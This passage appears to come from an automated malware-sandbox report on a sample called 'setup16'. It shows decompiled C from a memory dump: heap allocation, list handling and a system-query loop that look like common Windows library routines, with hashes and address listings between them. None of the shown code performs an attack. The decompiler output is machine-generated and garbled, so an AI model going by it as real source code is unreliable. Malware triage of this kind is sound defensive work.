				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04A1D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04A0F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L049E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L049E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04A0F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L049E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                                                                                                        0x04a9740d
                                                                                                                                                                                                        0x04a9740d
                                                                                                                                                                                                        0x04a97412
                                                                                                                                                                                                        0x04a97413
                                                                                                                                                                                                        0x04a97416
                                                                                                                                                                                                        0x04a97418
                                                                                                                                                                                                        0x04a9741c
                                                                                                                                                                                                        0x04a9741f
                                                                                                                                                                                                        0x04a97422
                                                                                                                                                                                                        0x04a97422
                                                                                                                                                                                                        0x04a97428
                                                                                                                                                                                                        0x04a9742a
                                                                                                                                                                                                        0x04a9742a
                                                                                                                                                                                                        0x04a97451
                                                                                                                                                                                                        0x04a97432
                                                                                                                                                                                                        0x04a9744f
                                                                                                                                                                                                        0x04a9744f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a97434
                                                                                                                                                                                                        0x04a97438
                                                                                                                                                                                                        0x04a97443
                                                                                                                                                                                                        0x04a97517
                                                                                                                                                                                                        0x04a97517
                                                                                                                                                                                                        0x04a9751a
                                                                                                                                                                                                        0x04a97535
                                                                                                                                                                                                        0x04a97520
                                                                                                                                                                                                        0x04a97527
                                                                                                                                                                                                        0x04a9752c
                                                                                                                                                                                                        0x04a97531
                                                                                                                                                                                                        0x04a97533
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a97533
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a97531
                                                                                                                                                                                                        0x04a9754b
                                                                                                                                                                                                        0x04a9754f
                                                                                                                                                                                                        0x04a9755c
                                                                                                                                                                                                        0x04a9755c
                                                                                                                                                                                                        0x04a9755f
                                                                                                                                                                                                        0x04a97560
                                                                                                                                                                                                        0x04a97561
                                                                                                                                                                                                        0x04a97562
                                                                                                                                                                                                        0x04a97563
                                                                                                                                                                                                        0x04a97568
                                                                                                                                                                                                        0x04a9756a
                                                                                                                                                                                                        0x04a9756c
                                                                                                                                                                                                        0x04a9756d
                                                                                                                                                                                                        0x04a9756d
                                                                                                                                                                                                        0x04a9756f
                                                                                                                                                                                                        0x04a97572
                                                                                                                                                                                                        0x04a97574
                                                                                                                                                                                                        0x04a97577
                                                                                                                                                                                                        0x04a9757c
                                                                                                                                                                                                        0x04a9757f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a97551
                                                                                                                                                                                                        0x04a97551
                                                                                                                                                                                                        0x04a97551
                                                                                                                                                                                                        0x04a97553
                                                                                                                                                                                                        0x04a97553
                                                                                                                                                                                                        0x04a97449
                                                                                                                                                                                                        0x04a97449
                                                                                                                                                                                                        0x04a9744c
                                                                                                                                                                                                        0x04a9744c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a9744c
                                                                                                                                                                                                        0x04a97443
                                                                                                                                                                                                        0x04a9750e
                                                                                                                                                                                                        0x04a97514
                                                                                                                                                                                                        0x04a97514
                                                                                                                                                                                                        0x04a97455
                                                                                                                                                                                                        0x04a97469
                                                                                                                                                                                                        0x04a9746d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a97473
                                                                                                                                                                                                        0x04a97473
                                                                                                                                                                                                        0x04a97476
                                                                                                                                                                                                        0x04a97480
                                                                                                                                                                                                        0x04a97484
                                                                                                                                                                                                        0x04a9748e
                                                                                                                                                                                                        0x04a97493
                                                                                                                                                                                                        0x04a97493
                                                                                                                                                                                                        0x04a97496
                                                                                                                                                                                                        0x04a97499
                                                                                                                                                                                                        0x04a974a1
                                                                                                                                                                                                        0x04a974b1
                                                                                                                                                                                                        0x04a974b5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a974bb
                                                                                                                                                                                                        0x04a974c1
                                                                                                                                                                                                        0x04a974c1
                                                                                                                                                                                                        0x04a974c4
                                                                                                                                                                                                        0x04a974c5
                                                                                                                                                                                                        0x04a974c6
                                                                                                                                                                                                        0x04a974c7
                                                                                                                                                                                                        0x04a974c8
                                                                                                                                                                                                        0x04a974cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a974d3
                                                                                                                                                                                                        0x04a974d3
                                                                                                                                                                                                        0x04a974d6
                                                                                                                                                                                                        0x04a974d8
                                                                                                                                                                                                        0x04a974db
                                                                                                                                                                                                        0x04a974dd
                                                                                                                                                                                                        0x04a974e0
                                                                                                                                                                                                        0x04a974e7
                                                                                                                                                                                                        0x04a974ee
                                                                                                                                                                                                        0x04a974ee
                                                                                                                                                                                                        0x04a974f4
                                                                                                                                                                                                        0x04a974f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a974fb
                                                                                                                                                                                                        0x04a974fb
                                                                                                                                                                                                        0x04a974fd
                                                                                                                                                                                                        0x04a97500
                                                                                                                                                                                                        0x04a97503
                                                                                                                                                                                                        0x04a97505
                                                                                                                                                                                                        0x04a97505
                                                                                                                                                                                                        0x04a974f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a974cd
                                                                                                                                                                                                        0x04a974b5
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                                                                                        • Instruction ID: dea58a16843c2a44b0c63375e77c2719b8baaa6ccbb3305c8e6b52a51a33d783
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC517A75600606EFDF56CF14C580A96BBF5FF49704F14C0AAE9089F262E771E946CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F2990 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                                        			E049F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4a9ff00);
				E04A1D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x49a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04A0E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x49a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04A451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x49a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E049F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E049D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E049F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E049DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E049F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E049F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E049F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04A1D0D1(_t62);
				goto L28;
			}





















                                                                                                                                                                                                        0x049f2990
                                                                                                                                                                                                        0x049f2992
                                                                                                                                                                                                        0x049f2997
                                                                                                                                                                                                        0x049f29a3
                                                                                                                                                                                                        0x049f29a6
                                                                                                                                                                                                        0x049f29ab
                                                                                                                                                                                                        0x049f29ad
                                                                                                                                                                                                        0x049f29b2
                                                                                                                                                                                                        0x04a35c80
                                                                                                                                                                                                        0x049f29b8
                                                                                                                                                                                                        0x049f29b8
                                                                                                                                                                                                        0x049f29bb
                                                                                                                                                                                                        0x049f29c0
                                                                                                                                                                                                        0x049f29c5
                                                                                                                                                                                                        0x049f29c6
                                                                                                                                                                                                        0x049f29c6
                                                                                                                                                                                                        0x049f29cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29cd
                                                                                                                                                                                                        0x049f29d0
                                                                                                                                                                                                        0x049f29d9
                                                                                                                                                                                                        0x049f29db
                                                                                                                                                                                                        0x049f29dd
                                                                                                                                                                                                        0x049f2a7f
                                                                                                                                                                                                        0x049f2a84
                                                                                                                                                                                                        0x049f2a87
                                                                                                                                                                                                        0x049f2a89
                                                                                                                                                                                                        0x04a35ca1
                                                                                                                                                                                                        0x04a35ca3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29db
                                                                                                                                                                                                        0x049f29e6
                                                                                                                                                                                                        0x049f29e9
                                                                                                                                                                                                        0x049f29eb
                                                                                                                                                                                                        0x049f29ed
                                                                                                                                                                                                        0x049f29f3
                                                                                                                                                                                                        0x049f29f5
                                                                                                                                                                                                        0x049f29f8
                                                                                                                                                                                                        0x049f29fa
                                                                                                                                                                                                        0x049f2a97
                                                                                                                                                                                                        0x049f2a9a
                                                                                                                                                                                                        0x049f2a9d
                                                                                                                                                                                                        0x049f2add
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a9f
                                                                                                                                                                                                        0x049f2aa2
                                                                                                                                                                                                        0x049f2aa5
                                                                                                                                                                                                        0x049f2aa8
                                                                                                                                                                                                        0x049f2aab
                                                                                                                                                                                                        0x04a35cab
                                                                                                                                                                                                        0x04a35caf
                                                                                                                                                                                                        0x04a35cc5
                                                                                                                                                                                                        0x04a35cda
                                                                                                                                                                                                        0x04a35cdc
                                                                                                                                                                                                        0x04a35cdf
                                                                                                                                                                                                        0x04a35ce5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35ceb
                                                                                                                                                                                                        0x04a35ced
                                                                                                                                                                                                        0x04a35cee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cee
                                                                                                                                                                                                        0x04a35cb1
                                                                                                                                                                                                        0x04a35cb4
                                                                                                                                                                                                        0x04a35cb9
                                                                                                                                                                                                        0x04a35cbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x04a35cbb
                                                                                                                                                                                                        0x049f2ab1
                                                                                                                                                                                                        0x049f2ab1
                                                                                                                                                                                                        0x049f2ac4
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x049f2aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a00
                                                                                                                                                                                                        0x049f2a09
                                                                                                                                                                                                        0x049f2a0e
                                                                                                                                                                                                        0x049f2a21
                                                                                                                                                                                                        0x049f2a24
                                                                                                                                                                                                        0x049f2a35
                                                                                                                                                                                                        0x049f2a3a
                                                                                                                                                                                                        0x049f2a3d
                                                                                                                                                                                                        0x049f2a42
                                                                                                                                                                                                        0x049f2a59
                                                                                                                                                                                                        0x049f2a59
                                                                                                                                                                                                        0x049f2a5c
                                                                                                                                                                                                        0x049f2a5f
                                                                                                                                                                                                        0x049f2a5f
                                                                                                                                                                                                        0x049f29fa
                                                                                                                                                                                                        0x049f29f3
                                                                                                                                                                                                        0x049f2a64
                                                                                                                                                                                                        0x049f2a64
                                                                                                                                                                                                        0x049f2a6b
                                                                                                                                                                                                        0x049f2a6b
                                                                                                                                                                                                        0x049f2a6d
                                                                                                                                                                                                        0x049f2a72
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6307b1aaca0a818a1de60f4942a9f476c188e5750a248685671c3548f06a2440
                                                                                                                                                                                                        • Instruction ID: 15264bce29be88753b8406dcd212ee0564349fcc5a0ca0a9b6cbc079014cd41a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6307b1aaca0a818a1de60f4942a9f476c188e5750a248685671c3548f06a2440
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10515B71A00219EFDF25DF55CD40ADEBBB6BF48318F1480A5E914AB250D336ED52DBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F4D3B Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E049F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4abd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04A0FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4ab7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04A0B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L049E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E049CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04A0B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04A0F380(_t67 + 0xc, 0x49a5138, 0x10) == 0) {
								 *0x4ab60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E049F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E049F4E70(0x4ab86b0, 0x49f5690, 0, 0) != 0) {
					_t46 = E049CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                                                                                                        0x049f4d3b
                                                                                                                                                                                                        0x049f4d4d
                                                                                                                                                                                                        0x049f4d53
                                                                                                                                                                                                        0x049f4d58
                                                                                                                                                                                                        0x049f4d65
                                                                                                                                                                                                        0x049f4d6c
                                                                                                                                                                                                        0x049f4d71
                                                                                                                                                                                                        0x049f4d77
                                                                                                                                                                                                        0x049f4d7f
                                                                                                                                                                                                        0x049f4d8c
                                                                                                                                                                                                        0x049f4d8e
                                                                                                                                                                                                        0x049f4dad
                                                                                                                                                                                                        0x049f4db0
                                                                                                                                                                                                        0x049f4db7
                                                                                                                                                                                                        0x049f4db8
                                                                                                                                                                                                        0x049f4db9
                                                                                                                                                                                                        0x049f4dba
                                                                                                                                                                                                        0x049f4dbb
                                                                                                                                                                                                        0x049f4dc1
                                                                                                                                                                                                        0x049f4dc8
                                                                                                                                                                                                        0x049f4dcc
                                                                                                                                                                                                        0x049f4dd5
                                                                                                                                                                                                        0x049f4dde
                                                                                                                                                                                                        0x049f4ddf
                                                                                                                                                                                                        0x049f4de0
                                                                                                                                                                                                        0x049f4de1
                                                                                                                                                                                                        0x049f4de6
                                                                                                                                                                                                        0x049f4de7
                                                                                                                                                                                                        0x049f4de9
                                                                                                                                                                                                        0x049f4df3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36c7c
                                                                                                                                                                                                        0x04a36c8a
                                                                                                                                                                                                        0x04a36c8a
                                                                                                                                                                                                        0x04a36c9d
                                                                                                                                                                                                        0x04a36ca7
                                                                                                                                                                                                        0x04a36cac
                                                                                                                                                                                                        0x04a36cb2
                                                                                                                                                                                                        0x04a36cb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36cbf
                                                                                                                                                                                                        0x04a36cbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36cbf
                                                                                                                                                                                                        0x04a36cb9
                                                                                                                                                                                                        0x049f4dfb
                                                                                                                                                                                                        0x04a36ccf
                                                                                                                                                                                                        0x04a36cd3
                                                                                                                                                                                                        0x049f4e32
                                                                                                                                                                                                        0x049f4e39
                                                                                                                                                                                                        0x04a36ce0
                                                                                                                                                                                                        0x04a36cf2
                                                                                                                                                                                                        0x04a36cf2
                                                                                                                                                                                                        0x04a36ce0
                                                                                                                                                                                                        0x049f4e3f
                                                                                                                                                                                                        0x049f4e41
                                                                                                                                                                                                        0x049f4e51
                                                                                                                                                                                                        0x049f4e51
                                                                                                                                                                                                        0x049f4e03
                                                                                                                                                                                                        0x049f4e03
                                                                                                                                                                                                        0x049f4e09
                                                                                                                                                                                                        0x049f4e0f
                                                                                                                                                                                                        0x049f4e57
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4e1b
                                                                                                                                                                                                        0x049f4e30
                                                                                                                                                                                                        0x049f4e5b
                                                                                                                                                                                                        0x049f4e5b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4e30
                                                                                                                                                                                                        0x049f4e11
                                                                                                                                                                                                        0x049f4e11
                                                                                                                                                                                                        0x049f4e16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4e16
                                                                                                                                                                                                        0x049f4e01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4e01
                                                                                                                                                                                                        0x049f4da5
                                                                                                                                                                                                        0x04a36c6b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4dab
                                                                                                                                                                                                        0x049f4dab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4dab

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a7bf99dcd5279c85c835dbe3373af3b5b9cd9e004226c035438382e9429ac265
                                                                                                                                                                                                        • Instruction ID: 0cfb89b374567457a79578a4ccfc4ba7bd5476c5abe6f4db8547af68ddf3f34e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7bf99dcd5279c85c835dbe3373af3b5b9cd9e004226c035438382e9429ac265
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C241C371A40318AFEB31DF14CD84FA7B7AAEB54714F0044A9EA4597281E774FD44CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F4BAD Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E049F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
